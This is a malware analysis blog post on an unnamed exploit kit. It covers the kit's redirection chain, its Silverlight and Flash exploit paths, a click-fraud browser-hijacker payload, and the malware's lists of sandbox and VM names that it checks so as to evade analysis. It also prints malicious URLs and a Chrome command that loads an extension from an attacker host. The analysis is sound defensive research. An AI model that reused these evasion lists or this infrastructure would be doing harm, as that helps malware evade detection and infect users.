Every now and again we come across new URL patterns when investigating traffic captures. In some cases, they are variations of existing redirectors or exploit kits which play the cat-and-mouse game with security researchers, other times they are the indication of a new threat.

But what makes something 'new', and how can you be sure that it is indeed something truly novel? Unless you have tracked the drive-by / exploit kit scene from day one or been able to map it out down to the tiniest details, this is not something easy.

There are a few reasons for this. For one, the landscape is vast and ever-changing, bringing an overwhelming amount of information that needs to be dissected and categorized.

Secondly, much of what we see is what the bad guys are showing us, which essentially means client-side traffic.

What about the back-end structure, the actual actors in this ecosystem?

Thankfully we do get the chance to look at it thanks to the relentless work of dedicated researchers such as @kafeine. But sometimes, there are still some things that are left unclear or may confuse some of us (including the author of this article).

When a security researcher stumbles upon something he does not recognize, he often calls it 'unknown' for the lack of information needed to give it a proper name.

This post will dig into such a case that has been floating around for some time now and may finally get a chance to have enough exposure to be categorized.

The 'Unknown' Exploit Kit

A couple of weeks ago, we observed a new traffic pattern (new to us) that first caught our attention for a couple of reasons:
  • The payload's size did not match that of any URL from the capture
  • The URL patterns were new
Before diving into the exploit kit itself, let's first take a look at how we got there.

Redirection chain

Raw traffic:

raw_traffic_1 raw_traffic_2

Traffic highlights:

hxxp://flyclick.biz/click?app=app8&click=c7d3c12b-1e98-4cde-b4a1-36b9e8acd624&search=7c9ec1c9-b3ac-4a88-a99f-c95bb7c07d02&feed=18418

HTTP/1.1 302 Found
Server: nginx
Date: Wed, 20 Aug 2014 11:19:58 GMT
Connection: keep-alive
Location: http://chokoboko.com/reject/
Content-Length: 0
hxxp://chokoboko.com/reject/
//document.write("http://flyclick.biz/click?app=app20&click=d4467442-220a-4890-9157-57bddb24bcbd&search=765b6198-a556-4367-9633-8adb52afcf8e&feed=18398");
hxxp://flyclick.biz/click?app=app20&click=d4467442-220a-4890-9157-57bddb24bcbd&search=765b6198-a556-4367-9633-8adb52afcf8e&feed=18398
HTTP/1.1 302 Found
Server: nginx
Date: Wed, 20 Aug 2014 11:20:01 GMT
Connection: keep-alive
Location: http://color-finance.com/preview.php
Content-Length: 0
hxxp://color-finance.com/preview.php
<iframe width="100px" height="100" src="http://46.229.172.100/?link=beba101f-36a6-4598-71f9-0e61e3554507&pid=1356" border="0" scrolling="no">
hxxp://46.229.172.100/?link=beba101f-36a6-4598-71f9-0e61e3554507&pid=1356
HTTP/1.1 303 See Other
Content-Type: text/plain
Location: http://109.206.160.239/click.php?id=pyTaT8AKcaTIksmgJNHIS0ScSv6TIH81L5CTvXcE2_XQKhh-xjI5zlT-Ug3DP_f7lKVFHULQP0wW8juws3MOIKNAX-LVRn2iw_ejzP98UJc%2C
Date: Wed, 20 Aug 2014 19:22:09 GMT
Content-Length: 173
hxxp://109.206.160.239/click.php?id=pyTaT8AKcaTIksmgJNHIS0ScSv6TIH81L5CTvXcE2_XQKhh-xjI5zlT-Ug3DP_f7lKVFHULQP0wW8juws3MOIKNAX-LVRn2iw_ejzP98UJc%2C
HTTP/1.1 302 Moved Temporarily
Server: nginx
Date: Wed, 20 Aug 2014 09:15:53 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Set-Cookie: goal=31102%7Ccolor-finance.com%7CGBR%7Cbluelakes%7C66734%7Csanyo+troubleshooting; expires=Thu, 21-Aug-2014 11:20:38 GMT; path=/; domain=.bizzclick.com
Location: http://www.inpoucher.com/video2014/index.php?said=do1okr03df315a
Content-Length: 0
hxxp://www.inpoucher.com/video2014/index.php?said=do1okr03df315a
 <i frame vspace="0" marginheight="0" marginwidth="0" hspace="0" scrolling="no" width="13" height="12" src="hxxp://www.pizzanetp.com/nhqdxa/eipm.php" frameborder="0"></I FRAME>
This last web session leads to the unknown exploit kit's landing page.

Landing page:

hxxp://www.pizzanetp.com/nhqdxa/eipm.php

Domains on that IP address (76.74.157.161):

  • www.sempikoa.com
  • www.inpoucher.com
  • www.pizzanetp.com
  • www.theyfenako.com
  • www.webinarster.com
Here is some additional information on the IP address from VirusTotal:

Earliest recorded event for the pizzanetp.com domain:

pizzanet_june

Earlier record for two of the other domains:

earlier_other_domains

Link with previous research:

IP_earlier_record

The structure of the URL and IP matches one found earlier by @MalwareSigs on IP 72.51.47.69:

origins

Credits to @kafeine, @MalwareSigs, @malware_traffic for their hard work.

Exploit Kit overview

Unknown_EK

This exploit kit targets two different pieces of software: Microsoft Silverlight and Adobe Flash. However, unlike some other exploit kits it will only push one exploit per load giving preference to Silverlight first and then Flash.

Attack paths

Silverlight only:

Silverlight_only

Flash only:

Flash_only

Silverlight and Flash:

Silverlight_and_Flash

 

All three successful paths lead to either a:

  • Silverlight exploit
  • Flash exploit
 

Case #1: Silverlight exploit scenario

Unknown_EK(Silverlight)

Landing page

URL: hxxp://www.pizzanetp.com/nhqdxa/eipm.php (static name)

landing_obfuscated

Deobfuscated highlights:

silverlight_decrypted_1

silverlight_decrypted_2

Silverlight exploit

URL: hxxp://www.pizzanetp.com/nhqdxa/vpclcy.x (static name) Here's the Silverlight object required to fire the exploit:

silverlight_object

Here's the call to the API (InternetOpenUrlA) used for the exploit (memory leak):

CalltoAPI(silverlight)

After loading shellcode in memory, it can run the payload from the heap with read and write privileges:

Heap

Now the DLL is invoked and the system infected (note that the dropped DLL name is randomized each time):

DLL_run

Case #2: Flash exploit scenario

Unknown_EK(Flash)

Landing page

Same as case #1.

Flash exploit

URL: hxxp://www.pizzanetp.com/nhqdxa/oujyt.swf (static name)
  • Version used: 11.3.300.273
  • VirusTotal detection: (7/54) and metadata:
SWF_metadata

Flex

Payload

  • Silverlight initiated payload: hxxp://www.pizzanetp.com/nhqdxa/yztl.php (static name)
Hash: ba9d1976118c944bc70a200a6bfd961c75bc534ec0a7e687ad7f13db403b7280
  • Flash initiated payload: hxxp://www.pizzanetp.com/nhqdxa/gjtzssq.php (static name)
Hash: a190900ee5bfd20e0e4e79a361905c0244a526def158a7dae72a8a81cf994b46

Both files are the same payload even if their size differs. This is due to the encoding/decoding routines specific to Silverlight and Flash.

Evasion techniques

The malware retrieves a list of installed services by enumerating the following registry key: HKLM\SYSTEM\ControlSet001\Services

check_services

Blacklisted services (virtualization products):

vmicexchange
vmci
vmdebug
vmmouse
VMTools
VMMEMCTL
vmware
vmx86
vpc-s3
vpcuhub
msvmmouf
VBoxMouse
VBoxGuest
VBoxSF
xenevtchn
xennet
xennet6
xensvc
xenvdb
The malware retrieves a list of running processes by executing a WMI script ("Select * from Win32_Process")

wmi_script

Blacklisted processes (virtualization products, sandboxes, and analyst tools):

enumerate_items

vmware
vmount2
vmusrvc
vmsrvc
VboxService
vboxtray
xenservice
joeboxserver
joeboxcontrol
wireshark
sniff_hit
sysAnalyzer
filemon
procexp
procmon
regmon
autoruns
The malware retrieves a list of files in the system32 (%windir%\system32) directory and looks for blacklisted files (virtualization products):

find_files

xenvdb
hgfs.sys
vmhgfs.sys
prleth.sys
prlfs.sys
prlmouse.sys
prlvideo.sys
prl_pv32.sys
vpc-s3.sys
vmsrvc.sys
vmx86.sys
vmnet.sys

Payload details

Google Chrome (version 36.0.1985) is downloaded from a remote server:
hxxp://109.206.180.132/hfudk435k/cn.36.2?i=7BF06358932C9C6CF9DA699098A7006E&a=136&b=190963631
download_chrome

Named "browser.exe", the chrome exe, it creates a folder in the user's appdata folder, named by joining two strings:

First list: Game,Tool,Utility,Sysutil,Browser,Navigator,Modulator,Receiver,Calculator,Validator,UI,Provider,Teller,Narrator,Supporter,Volunteer,Vinyl,Polyester,Cotton,Whisky

Second list: Visual,Optional,Jawa,Software,Assistant,Model,Gravity,Higgs,Medium,Noteworthy,Pale,Infinity,Voice,Sync,Joint,Mobile,Wireless,Radio,Humble,Beerware

On the analysis machine, the path to Chrome was "C:\Documents and Settings\Administrator\Local Settings\Application Data\SupporterSoftware\ToolModel\browser.exe"

The malware DLL is remotely loaded into chrome and the main thread resumes.

dll_injected

This process is created in a suspended state, with an additional URL argument:

"C:\Documents and Settings\Administrator\Local Settings\Application Data\SupporterSoftware\ToolModel\browser.exe" --load-extension="C:\Documents and Settings\Administrator\Local Settings\Application Data\SupporterSoftware\UtilityMedium" http://206.51.231.110/jNryH6/dERkj82cbbR2?t=41170B8939AF1570CD8993627E6CA162&o=145&y=1
create_chrome

Here is the source code of that URL:

<html><title>144.76.80.177|searchaccess.com|60,93,45,68|</title><script>window.setTimeout(function () { window.location="http://searchaccess.com/?search=scrabble+word+finder&JdueHdbS=http%3A%2F%2Fflyclick.biz%2Fclick%..."; }, 8000);</script></html>
searchaccess.com displays a "not active" message:

notactive

But let's not get fooled by this. Here's how Google indexed the server:

Google_index

And here is the WHOIS information which does raise some eyebrows:

whois

Additional search on the domain shows that its Name Servers used to (first seen 2013-12-30 13:40:36 -0000) resolve to:

searchaccess.com. NS buy.internettraffic.com
searchaccess.com. NS sell.internettraffic.com
Correlating those NS, we can find interesting information about click fraud activity.

If you are infected with this piece of malware, please read this removal guide from Pieter Arntz.

Conclusions

The payload appears to be a browser hijack whose goal is to illegally gain advertising revenue from infected computers.

What is perhaps more puzzling is the fact that this exploit kit has been around for so long and yet has been so quiet, not to mention the fact that reproducing an infection even with the proper referers is rather difficult (IP blacklisting, geolocation, etc).

Another big question remains: Why would the author(s) bother with such advanced fingerprinting and evasion techniques, something we don't normally see in typical malware.

It seems that this bit of research has brought up more questions than when we started. That is not unusual though, and at least some dots have been connected.

With additional contributions from David Sanchez, Joshua Cannell and Steven Burn.

@jeromesegura